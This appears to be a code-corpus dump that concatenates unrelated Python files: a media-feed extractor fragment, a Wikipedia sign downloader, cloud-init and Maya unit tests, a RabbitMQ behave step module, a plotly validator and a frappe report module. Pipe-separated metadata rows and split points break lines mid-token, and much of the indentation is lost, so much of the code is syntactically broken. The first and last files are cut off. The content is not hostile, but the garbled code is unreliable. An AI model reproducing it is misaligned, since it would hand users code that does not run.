uri = re.sub(r'(episode:[^.]+)(\.cc)?\.com', r'\1.cc.com', uri)
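        # e.g. a uri ending in 'episode:thedailyshow.com' becomes
        # 'episode:thedailyshow.cc.com' (hypothetical value, shown only to
        # illustrate the substitution above); uris without '.com' are untouched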
index_url = 'http://%s.cc.com/feeds/mrss?%s' % (show_name, compat_urllib_parse.urlencode({'uri': uri}))
idoc = self._download_xml(
index_url, epTitle,
'Downloading show index', 'Unable to download episode index')
title = idoc.find('./channel/title').text
description = idoc.find('./channel/description').text
entries = []
item_els = idoc.findall('.//item')
for part_num, itemEl in enumerate(item_els):
upload_date = unified_strdate(itemEl.findall('./pubDate')[0].text)
thumbnail = itemEl.find('.//{http://search.yahoo.com/mrss/}thumbnail').attrib.get('url')
content = itemEl.find('.//{http://search.yahoo.com/mrss/}content')
duration = float_or_none(content.attrib.get('duration'))
mediagen_url = content.attrib['url']
guid = itemEl.find('./guid').text.rpartition(':')[-1]
cdoc = self._download_xml(
mediagen_url |
radicalbiscuit/mutcd-getter | mutcd-getter.py | Python | mit | 5,919 | 0.003886 | #!/usr/bin/env python
"""Get MUTCD SVGs from Wikipedia."""
import urllib
import argparse
import os
import json
from lxml import html
import wikipedia
from pyquery import PyQuery
class MUTCDGetterError(Exception):
pass
# Setup arguments.
parser = argparse.ArgumentParser()
parser.add_argument('--title', default='Comparison of MUTCD-Influenced Traffic Signs',
help='The title of the Wikipedia entry containing the tables of MUTCD-inspired signs.')
parser.add_argument('--tables', default='Warning,Regulatory,Mandatory or permitted actions,Other (indication)',
help='The headers of the tables whose signs you wish to retrieve.')
parser.add_argument('--column', default='USA',
help='The identifier representing the column you wish to pull from each table (e.g. 5, or "USA").')
parser.add_argument('--output_folder', default=os.getcwd(),
help='The path to the folder into which the signage and common names file should be downloaded.')
parser.add_argument('--common_names_filename', default='mutcd_common_names.json',
help='The filename for the JSON-formatted file mapping common sign names to SVG file names.')
parsed_args = parser.parse_args()
# Get the requested article.
print('Fetching the wikipedia page...')
wiki_page = wikipedia.page(parsed_args.title)
# Parse the html and wrap it in pyquery.
d = PyQuery(html.fromstring(wiki_page.html()))
# Get a list of all headers in the document, to be filtered later for each table's header.
all_headers = d(':header')
# Create a data structure to store sign data and filenames.
signs = []
raw_filename_map = {}
print('Finding the SVGs. Hang tight. This may take a couple of minutes.\n')
# For each table header, get the associated table.
table_headers = parsed_args.tables.split(',')
for table_header in table_headers:
table_signs = {
'type': 'category',
'text': table_header,
'data': []
}
table = PyQuery(all_headers.filter(lambda: this.text_content() == table_header + '[edit]').next_all('table')[0])
    first_row = table('tr:nth-child(1)')
column = parsed_args.column
if isinstance(column, str):
# If the provided column is a string, find the column index. While this is probably the same for each table,
        # we'll still check every time. It's cheap and this is an infrequent script.
for i, header_cell in enumerate(first_row.find('th')):
if header_cell.text_content().strip().startswith(column):
column = i
break
if isinstance(column, str):
# We couldn't find it.
raise MUTCDGetterError('The specified column header could not be found.')
# Get all rows following the first row.
table_rows = first_row.next_all('tr')
for row in table_rows:
row = PyQuery(row)
# Due to a current pyquery bug, nth-child does not work right.
row_header = PyQuery(row.find('td')[0]).text()
if not row_header:
# This is an intermediary header row to remind readers which column is which.
continue
target_cell_imgs = PyQuery(row.find('td')[column]).find('img[alt$=svg]')
if not target_cell_imgs:
continue
row_sign_filenames = []
target_cell_imgs.each(lambda: row_sign_filenames.append(
{
'type': 'sign filename',
'text': PyQuery(this).attr('alt').replace(' ', '_'),
}
))
filenames_to_remove = []
for filename in row_sign_filenames:
# Download the SVG(s).
try:
image_page = PyQuery('http://en.wikipedia.org/wiki/File:{}'.format(filename['text']))
svg_link = image_page.find('a.internal').filter(lambda: this.text_content().strip() == 'Original file')
svg_url = svg_link.attr('href')
if not svg_url:
print(
'Could not find URL for {table_header}: {row_header}: {filename}\n'.format(
table_header=table_header,
row_header=row_header,
filename=filename['text']
)
)
if svg_url.startswith('//'):
# De-relativize to an absolute URL.
svg_url = 'http:' + svg_url
urllib.urlretrieve(svg_url, os.path.join(parsed_args.output_folder, filename['text']))
raw_filename_map[filename['text']] = {
'category': table_header,
'commonName': row_header,
}
except KeyboardInterrupt:
raise
except:
# Plan for success, prepare for absolute destruction of everything you hold dear.
print(
'An unknown error occurred while attempting to retrieve '
'{table_header}: {row_header}: {filename}\n'.format(
table_header=table_header,
row_header=row_header,
filename=filename['text']
)
)
filenames_to_remove.append(filename)
for filename in filenames_to_remove:
row_sign_filenames.remove(filename)
if row_sign_filenames:
table_signs['data'].append({
'type': 'common name',
'text': row_header,
'data': row_sign_filenames,
})
if table_signs['data']:
signs.append(table_signs)
with open(os.path.join(parsed_args.output_folder, parsed_args.common_names_filename), 'w') as json_file:
json.dump({'signs': signs, 'rawFilenameMap': raw_filename_map}, json_file, indent=4)
print('\nAll files written. Enjoy!')
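# Example invocations (illustrative; the defaults already target the USA column
# of the comparison tables):
#   python mutcd-getter.py --column USA --output_folder ./signs
#   python mutcd-getter.py --tables 'Warning,Regulatory' --common_names_filename names.json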
|
prometheanfire/cloud-init | tests/unittests/test_handler/test_handler_locale.py | Python | gpl-3.0 | 2,046 | 0 | # Copyright (C) 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
#
# Based on test_handler_set_hostname.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from cloudinit.config import cc_locale
from cloudinit import cloud
from cloudinit import distros
from cloudinit import helpers
from cloudinit import util
from cloudinit.sources import DataSourceNoCloud
from .. import helpers as t_help
from configobj import ConfigObj
from six import BytesIO
import logging
import shutil
import tempfile
LOG = logging.getLogger(__name__)
class TestLocale(t_help.FilesystemMockingTestCase):
def setUp(self):
super(TestLocale, self).setUp()
self.new_root = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.new_root)
    def _get_cloud(self, distro):
self.patchUtils(self.new_root)
paths = helpers.Paths({})
cls = distros.fetch(distro)
d = cls(distro, {}, paths)
ds = DataSourceNoCloud.DataSourceNoCloud({}, d, paths)
cc = cloud.Cloud(ds, paths, {}, d, None)
return cc
def test_set_locale_sles(self):
cfg = {
'locale': 'My.Locale',
}
cc = self._get_cloud('sles')
cc_locale.handle('cc_locale', cfg, cc, LOG, [])
contents = util.load_file('/etc/sysconfig/language', decode=False)
n_cfg = ConfigObj(BytesIO(contents))
self.assertEqual({'RC_LANG': cfg['locale']}, dict(n_cfg))
|
michcioperz/shirley | shirley.py | Python | mit | 1,574 | 0.003177 | #!/usr/bin/env python3
import argparse, os, subprocess, json, requests, re, string
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("source_host", type=str)
parser.add_argument("target_path", type=str)
args = parser.parse_args()
print("Now, what do we have here?")
r = requests.get("http://%s/otaku/shirley" % args.source_host)
    database = json.loads(r.text)
print("I see %i series with a total of %i episodes" % (len(database["series"]), len(database["videos"])))
for a in database["series"]:
print("Let's look for some %s" % a)
r = requests.get("http://%s/otaku/api/series/%s/find" % (args.source_host, a))
av = json.loads(r.text)
        print("There are %i episodes of it on the server" % len(av["videos"]))
avd = os.path.join(args.target_path, "".join([x if x in frozenset(string.ascii_letters+string.digits) else "" for x in a]))
if len(av["videos"]) > 0 and not os.path.exists(avd):
os.mkdir(avd)
for avi in av["videos"]:
print("Maybe %s?" % avi)
if not os.path.exists(os.path.join(avd, avi+".avi")):
subprocess.call(["ffmpeg", "-hide_banner", "-i", "http://%s/anime/%s/videoplayback.avi" % (args.source_host, avi), "-s", "320x240", "-acodec", "libmp3lame", "-vcodec", "mpeg4", "-vtag", "XVID", "-qscale", "5", os.path.join(avd, avi+".avi")])
print("Okay, what else...")
else:
print("Aha, it's already there.")
print("Okay, I think it's done, bye.")
|
plotly/python-api | packages/python/plotly/plotly/validators/choropleth/colorbar/_outlinecolor.py | Python | mit | 487 | 0.002053 | import _plotly_utils.basevalidators
class OutlinecolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name=" | outlinecolor", parent_name="choropleth.colorbar", **kwargs
):
super(OutlinecolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "colorbars"),
role=kwargs.pop("role", "style"),
**kwargs
)
|
robertojrojas/networking-Go | src/DaytimeServer/daytime-client.py | Python | mit | 162 | 0.006173 | import socket
conn = socket.create_connection(('localhost', 1200))
input = conn.makefile()
print input.readline()
conn.close()
# You can use telnet localhost 1200
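# A minimal Python stand-in for the daytime server (sketch only, not part of
# the original example; run it in another terminal before this client):
#   import socket, time
#   srv = socket.socket()
#   srv.bind(('localhost', 1200))
#   srv.listen(1)
#   while True:
#       c, _ = srv.accept()
#       c.sendall(time.ctime() + '\r\n')
#       c.close()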
|
telefonicaid/fiware-facts | tests/acceptance/features/component/steps/multi_tenancy.py | Python | apache-2.0 | 7,996 | 0.006005 | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with opensource@tid.es
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
context.secondary_tenant_id = \
configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE][PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]
print ("> Initiating Cloto REST Client for the secondary Tenant")
context.secondary_cloto_client = ClotoClient(
username=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
password=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
tenant_id=context.secondary_tenant_id,
auth_url=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
api_protocol=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PROTOCOL],
api_host=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
api_port=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
api_resource=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_RESOURCE])
print ("> A GET request is executed to CLOTO component, "
"to init all data about that secondary tenant in its system.")
_, response = context.secondary_cloto_client.\
get_tenant_id_resource_client().get_tenant_id(context.secondary_tenant_id)
assert_that(response.ok,
"TenantId '{}' for testing cannot be "
"retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def a_context_update_is_received_for_secondary_tenant(context, server_id):
send_context_notification_step_helper(context, context.secondary_tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured message bus')
def new_secondary_consumer_looking_for_messages(context):
# Init RabbitMQ consumer
    context.secondary_rabbitmq_consumer = RabbitMQConsumer(
amqp_host=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
amqp_port=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
amqp_user=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_USER],
amqp_password=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PASSWORD])
facts_message_config = \
configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
    context.secondary_rabbitmq_consumer.exchange = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
    context.secondary_rabbitmq_consumer.exchange_type = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
# Append consumer to the 'context' consumer list
    context.rabbitmq_consumer_list.append(context.secondary_rabbitmq_consumer)
# Set default window size to 2 (FACTS) - Secondary Tenant
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
context.rabbitmq_publisher.send_message(message)
# Run secondary consumer
    context.secondary_rabbitmq_consumer.routing_key = context.secondary_tenant_id
    context.secondary_rabbitmq_consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
for element in context.table.rows:
expected_message = dict(element.as_dict())
expected_message = _dataset_utils.prepare_data(expected_message)
        assert_that(expected_message, is_message_in_consumer_list(context.secondary_rabbitmq_consumer.message_list),
"A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
print ("> Received main list: " + str(context.secondaty_rabbitmq_consumer.message_list))
print ("> Received seconday list: " + str(context.rabbitmq_consumer.message_list))
    assert_that(context.secondary_rabbitmq_consumer.message_list, has_length(0),
"Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
    assert_that(context.secondary_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
context.rabbitmq_publisher.send_message(message)
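# Illustrative feature snippet these step definitions would match (hypothetical
# server id and counts):
#   Given the secondary tenant-id configured is registered in CLOTO component
#   And a new secondary RabbitMQ consumer is looking into the configured message bus
#   When a context notification is received for "server-01" and secondary tenant-id with values
#   Then "1" notification is sent to RabbitMQ with the secondary tenant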
|
goddardl/cortex | test/IECoreMaya/FnParameterisedHolderTest.py | Python | bsd-3-clause | 35,854 | 0.071791 | ##########################################################################
#
# Copyright (c) 2008-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import os
import unittest
import maya.cmds
import maya.OpenMaya
import IECore
import IECoreMaya
class TestOp( IECore.Op ) :
def __init__( self ) :
IECore.Op.__init__( self, "Tests stuff",
IECore.IntParameter(
name = "result",
description = "",
defaultValue = 0
)
)
self.parameters().addParameters(
[
IECore.IntParameter(
name = "i",
description = "i",
defaultValue = 1
),
]
)
def doOperation( self, args ) :
return IECore.IntData( 10 )
class FnParameterisedHolderTest( IECoreMaya.TestCase ) :
def test( self ) :
node = maya.cmds.createNode( "ieOpHolderNode" )
fnPH = IECoreMaya.FnParameterisedHolder( node )
self.assertEqual( fnPH.getParameterised(), ( None, "", 0, "" ) )
op = TestOp()
fnPH.setParameterised( op )
parameterisedTuple = fnPH.getParameterised()
self.assert_( parameterisedTuple[0].isSame( op ) )
self.assertEqual( parameterisedTuple[1:], ( "", 0, "" ) )
self.assertEqual( parameterisedTuple[0](), IECore.IntData( 10 ) )
iPlug = fnPH.parameterPlug( op["i"] )
self.assert_( isinstance( iPlug, maya.OpenMaya.MPlug ) )
		self.assertEqual( iPlug.asInt(), 1 )
self.assert_( fnPH.plugParameter( iPlug ).isSame( op["i"] ) )
self.assert_( fnPH.plugParameter( iPlug.name() ).isSame( op["i"] ) )
iPlug.setInt( 2 )
fnPH.setParameterisedValue( op["i"] )
self.assert_( op["i"].getNumericValue(), 2 )
op["i"].setNumericValue( 3 )
fnPH.setNodeValue( op["i"] )
		self.assertEqual( iPlug.asInt(), 3 )
iPlug.setInt( 10 )
fnPH.setParameterisedValues()
self.assert_( op["i"].getNumericValue(), 10 )
op["i"].setNumericValue( 11 )
fnPH.setNodeValues()
		self.assertEqual( iPlug.asInt(), 11 )
def testFullPathName( self ) :
node = maya.cmds.createNode( "ieOpHolderNode" )
fnPH = IECoreMaya.FnParameterisedHolder( node )
self.assertEqual( node, fnPH.fullPathName() )
procedural = maya.cmds.createNode( "ieProceduralHolder" )
fnPH = IECoreMaya.FnParameterisedHolder( procedural )
self.assertEqual( maya.cmds.ls( procedural, long=True )[0], fnPH.fullPathName() )
def testPlugParameterWithNonUniqueNames( self ) :
node = maya.cmds.createNode( "ieProceduralHolder" )
node2 = maya.cmds.createNode( "ieProceduralHolder" )
node = maya.cmds.ls( maya.cmds.rename( node, "iAmNotUnique" ), long=True )[0]
node2 = maya.cmds.ls( maya.cmds.rename( node2, "iAmNotUnique" ), long=True )[0]
fnPH = IECoreMaya.FnProceduralHolder( node )
proc = IECore.ReadProcedural()
fnPH.setParameterised( proc )
self.assert_( fnPH.getParameterised()[0].isSame( proc ) )
fnPH2 = IECoreMaya.FnProceduralHolder( node2 )
proc2 = IECore.ReadProcedural()
fnPH2.setParameterised( proc2 )
self.assert_( fnPH2.getParameterised()[0].isSame( proc2 ) )
# check that each function set references a different node.
self.assert_( fnPH.object()!=fnPH2.object() )
self.assert_( fnPH.fullPathName()!=fnPH2.fullPathName() )
plug = fnPH.parameterPlug( proc["motion"]["blur"] )
plug2 = fnPH2.parameterPlug( proc2["motion"]["blur"] )
self.assertEqual( plug.node(), fnPH.object() )
self.assertEqual( plug2.node(), fnPH2.object() )
self.assertEqual( fnPH.parameterPlugPath( proc["motion"]["blur"] ), "|transform1|iAmNotUnique.parm_motion_blur" )
self.assertEqual( fnPH2.parameterPlugPath( proc2["motion"]["blur"] ), "|transform2|iAmNotUnique.parm_motion_blur" )
self.assert_( maya.cmds.isConnected( "time1.outTime", fnPH.parameterPlugPath( proc["files"]["frame"] ), iuc=True ) )
self.assert_( maya.cmds.isConnected( "time1.outTime", fnPH2.parameterPlugPath( proc2["files"]["frame"] ), iuc=True ) )
def testSetNodeValuesUndo( self ) :
# make an opholder
		##########################################################################
node = maya.cmds.createNode( "ieOpHolderNode" )
fnPH = IECoreMaya.FnParameterisedHolder( node )
op = IECore.ClassLoader.defaultOpLoader().load( "parameterTypes", 1 )()
op.parameters().removeParameter( "m" ) # no color4f support in maya
fnPH.setParameterised( op )
# check we have the starting values we expect
		##########################################################################
self.assertEqual( op["a"].getNumericValue(), 1 )
aPlug = fnPH.parameterPlug( op["a"] )
self.assertEqual( aPlug.asInt(), 1 )
self.assertEqual( op["b"].getNumericValue(), 2 )
bPlug = fnPH.parameterPlug( op["b"] )
self.assertEqual( bPlug.asFloat(), 2 )
self.assertEqual( op["c"].getNumericValue(), 3 )
cPlug = fnPH.parameterPlug( op["c"] )
self.assertEqual( cPlug.asDouble(), 3 )
self.assertEqual( op["d"].getTypedValue(), "ssss" )
dPlug = fnPH.parameterPlug( op["d"] )
self.assertEqual( dPlug.asString(), "ssss" )
self.assertEqual( op["e"].getValue(), IECore.IntVectorData( [ 4, -1, 2 ] ) )
ePlug = fnPH.parameterPlug( op["e"] )
fnE = maya.OpenMaya.MFnIntArrayData( ePlug.asMObject() )
self.assertEqual( fnE[0], 4 )
self.assertEqual( fnE[1], -1 )
self.assertEqual( fnE[2], 2 )
self.assertEqual( fnE.length(), 3 )
self.assertEqual( op["f"].getValue(), IECore.StringVectorData( [ "one", "two", "three" ] ) )
fPlug = fnPH.parameterPlug( op["f"] )
fnF = maya.OpenMaya.MFnStringArrayData( fPlug.asMObject() )
fList = []
fnF.copyTo( fList )
self.assertEqual( fList, [ "one", "two", "three" ] )
self.assertEqual( op["g"].getTypedValue(), IECore.V2f( 1, 2 ) )
gPlug = fnPH.parameterPlug( op["g"] )
self.assertEqual( gPlug.child( 0 ).asFloat(), 1 )
self.assertEqual( gPlug.child( 1 ).asFloat(), 2 )
self.assertEqual( op["h"].getTypedValue(), IECore.V3f( 1, 1, 1 ) )
hPlug = fnPH.parameterPlug( op["h"] )
self.assertEqual( hPlug.child( 0 ).asFloat(), 1 )
self.assertEqual( hPlug.child( 1 ).asFloat(), 1 )
self.assertEqual( hPlug.child( 2 ).asFloat(), 1 )
self.assertEqual( op["q"].getTypedValue(), False )
qPlug = fnPH.parameterPlug( op["q"] )
self.assertEqual( qPlug.asBool(), False )
self.assertEqual( op["t"].getTypedValue(), IECore.Box3f( IECore.V3f( -1 ), IECore.V3f( 1 ) ) )
tPlug = fnPH.parameterPlug( op["t"] )
self.assertEqual( tPlug.child( 0 ).child( 0 ).asFloat(), -1 )
self.assertEqual( tPlug.child( 0 ).child( 1 ).asFloat(), -1 )
self.assertEqual( tPlug.child( 0 ).child( 2 ).asFloat(), -1 )
self.assertEqual( tPlug.child( 1 ).child( 0 ).asFloat(), 1 )
self.assertEqual( tPlug.child( 1 ).child( |
rohitwaghchaure/frappe | frappe/desk/reportview.py | Python | mit | 8,532 | 0.034341 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""build query for doclistview and return results"""
import frappe, json
import frappe.permissions
from frappe.model.db_query import DatabaseQuery
from frappe import _
@frappe.whitelist()
def get():
args = get_form_params()
data = compress(execute(**args), args = args)
return data
def execute(doctype, *args, **kwargs):
return DatabaseQuery(doctype).execute(*args, **kwargs)
def get_form_params():
"""Stringify GET request parameters."""
data = frappe._dict(frappe.local.form_dict)
del data["cmd"]
if isinstance(data.get("filters"), basestring):
data["filters"] = json.loads(data["filters"])
if isinstance(data.get("fields"), basestring):
data["fields"] = json.loads(data["fields"])
if isinstance(data.get("docstatus"), basestring):
data["docstatus"] = json.loads(data["docstatus"])
if isinstance(data.get("save_user_settings"), basestring):
data["save_user_settings"] = json.loads(data["save_user_settings"])
else:
data["save_user_settings"] = True
# queries must always be server side
data.query = None
return data
def compress(data, args = {}):
"""separate keys and values"""
from frappe.desk.query_report import add_total_row
if not data: return data
values = []
keys = data[0].keys()
for row in data:
new_row = []
for key in keys:
new_row.append(row[key])
values.append(new_row)
if args.get("add_total_row"):
meta = frappe.get_meta(args.doctype)
values = add_total_row(values, keys, meta)
return {
"keys": keys,
"values": values
}
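# Illustrative example (hypothetical rows): compress([{"name": "INV-001", "qty": 1}])
# would return {"keys": ["name", "qty"], "values": [["INV-001", 1]]} (key order
# follows the first row's dict).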
@frappe.whitelist()
def save_report():
"""save report"""
data = frappe.local.form_dict
if frappe.db.exists('Report', data['name']):
d = frappe.get_doc('Report', data['name'])
else:
d = frappe.new_doc('Report')
d.report_name = data['name']
d.ref_doctype = data['doctype']
d.report_type = "Report Builder"
d.json = data['json']
frappe.get_doc(d).save()
frappe.msgprint(_("{0} is saved").format(d.name))
return d.name
@frappe.whitelist()
def export_query():
"""export from report builder"""
form_params = get_form_params()
form_params["limit_page_length"] = None
form_params["as_list"] = True
doctype = form_params.doctype
add_totals_row = None
file_format_type = form_params["file_format_type"]
del form_params["doctype"]
del form_params["file_format_type"]
if 'add_totals_row' in form_params and form_params['add_totals_row']=='1':
add_totals_row = 1
del form_params["add_totals_row"]
frappe.permissions.can_export(doctype, raise_exception=True)
db_query = DatabaseQuery(doctype)
ret = db_query.execute(**form_params)
if add_totals_row:
ret = append_totals_row(ret)
data = [['Sr'] + get_labels(db_query.fields, doctype)]
for i, row in enumerate(ret):
data.append([i+1] + list(row))
if file_format_type == "CSV":
# convert to csv
import csv
from cStringIO import StringIO
f = StringIO()
writer = csv.writer(f)
for r in data:
# encode only unicode type strings and not int, floats etc.
writer.writerow(map(lambda v: isinstance(v, unicode) and v.encode('utf-8') or v, r))
f.seek(0)
frappe.response['result'] = unicode(f.read(), 'utf-8')
frappe.response['type'] = 'csv'
frappe.response['doctype'] = doctype
	elif file_format_type == "Excel":
from frappe.utils.xlsxutils import make_xlsx
xlsx_file = make_xlsx(data, doctype)
frappe.response['filename'] = doctype + '.xlsx'
frappe.response['filecontent'] = xlsx_file.getvalue()
		frappe.response['type'] = 'binary'
def append_totals_row(data):
if not data:
return data
data = list(data)
totals = []
totals.extend([""]*len(data[0]))
for row in data:
for i in xrange(len(row)):
if isinstance(row[i], (float, int)):
totals[i] = (totals[i] or 0) + row[i]
data.append(totals)
return data
def get_labels(fields, doctype):
"""get column labels based on column names"""
labels = []
for key in fields:
key = key.split(" as ")[0]
if "." in key:
parenttype, fieldname = key.split(".")[0][4:-1], key.split(".")[1].strip("`")
else:
parenttype = doctype
			fieldname = key.strip("`")  # plain fieldname, no table prefix
df = frappe.get_meta(parenttype).get_field(fieldname)
label = df.label if df else fieldname.title()
if label in labels:
label = doctype + ": " + label
labels.append(label)
return labels
@frappe.whitelist()
def delete_items():
"""delete selected items"""
import json
il = json.loads(frappe.form_dict.get('items'))
doctype = frappe.form_dict.get('doctype')
for i, d in enumerate(il):
try:
frappe.delete_doc(doctype, d)
if len(il) >= 5:
frappe.publish_realtime("progress",
dict(progress=[i+1, len(il)], title=_('Deleting {0}').format(doctype)),
user=frappe.session.user)
except Exception:
pass
@frappe.whitelist()
def get_sidebar_stats(stats, doctype, filters=[]):
cat_tags = frappe.db.sql("""select tag.parent as category, tag.tag_name as tag
from `tabTag Doc Category` as docCat
INNER JOIN tabTag as tag on tag.parent = docCat.parent
where docCat.tagdoc=%s
ORDER BY tag.parent asc,tag.idx""",doctype,as_dict=1)
return {"defined_cat":cat_tags, "stats":get_stats(stats, doctype, filters)}
@frappe.whitelist()
def get_stats(stats, doctype, filters=[]):
"""get tag info"""
import json
tags = json.loads(stats)
if filters:
filters = json.loads(filters)
stats = {}
columns = frappe.db.get_table_columns(doctype)
for tag in tags:
if not tag in columns: continue
tagcount = frappe.get_list(doctype, fields=[tag, "count(*)"],
